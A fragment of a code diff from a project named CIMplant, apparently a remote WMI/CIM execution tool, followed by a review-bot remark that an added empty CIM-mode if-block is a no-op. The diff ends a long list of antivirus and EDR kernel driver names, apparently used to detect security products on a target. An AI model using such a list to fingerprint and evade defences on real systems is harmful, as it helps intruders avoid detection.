+ "csaav.sys", "csaam.sys", "esensor.sys", "fsgk.sys", "fsatp.sys", "fshs.sys", "eaw.sys", "im.sys", "csagent.sys", "rvsavd.sys", "dgdmk.sys", "atrsdfw.sys",
+ "mbamwatchdog.sys", "edevmon.sys", "SentinelMonitor.sys", "edrsensor.sys", "ehdrv.sys", "HexisFSMonitor.sys", "CyOptics.sys", "CarbonBlackK.sys",
+ "CyProtectDrv32.sys", "CyProtectDrv64.sys", "CRExecPrev.sys", "ssfmonm.sys", "CybKernelTracker.sys", "SAVOnAccess.sys", "savonaccess.sys", "sld.sys",
+ "aswSP.sys", "FeKern.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "mfeaskm.sys", "mfencfilter.sys", "WFP_MRT.sys", "groundling32.sys", "SAFE-Agent.sys",
+ "groundling64.sys", "avgtpx86.sys", "avgtpx64.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys",
+ "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter.sys", "symevent.sys", "VirtualAgent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys",
+ "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys", "cfrmd.sys",
+ "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys"};
+ }
 }
\ No newline at end of file
diff --git a/CIMplant/Planter.cs b/CIMplant/Planter.cs
old mode 100755
new mode 100644
diff --git a/CIMplant/Program.cs b/CIMplant/Program.cs
old mode 100755
new mode 100644
index 16ceeb6..8399d24
--- a/CIMplant/Program.cs
+++ b/CIMplant/Program.cs
@@ -198,6 +198,11 @@ private static void Main(string[] args)
 {
 planter.Connector = new Connector(options.Wmi, planter);
+ if (!options.Wmi) //using CIM
+ {
+
+ }
+
 // We can use && since one will always start as null
 if (planter.Connector.ConnectedCimSession == null && planter.Connector.ConnectedWmiSession == null)
 {
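Review bot: The `if (!options.Wmi) //using CIM` block added in the Program.cs hunk has an empty body, so it compiles to a no-op and leaves the next reader guessing whether CIM-specific handling was forgotten or deliberately deferred. Either drop the five added lines, or keep the branch with an explicit marker such as `// TODO: CIM-only setup not yet implemented (see Connector.DoCimConnection)` so the intent survives review. As written, the existing `ConnectedCimSession == null && ConnectedWmiSession == null` check that follows is the only thing distinguishing a failed connection in either mode, which may be all that is needed. The enclosing `Main` begins and ends outside the hunk.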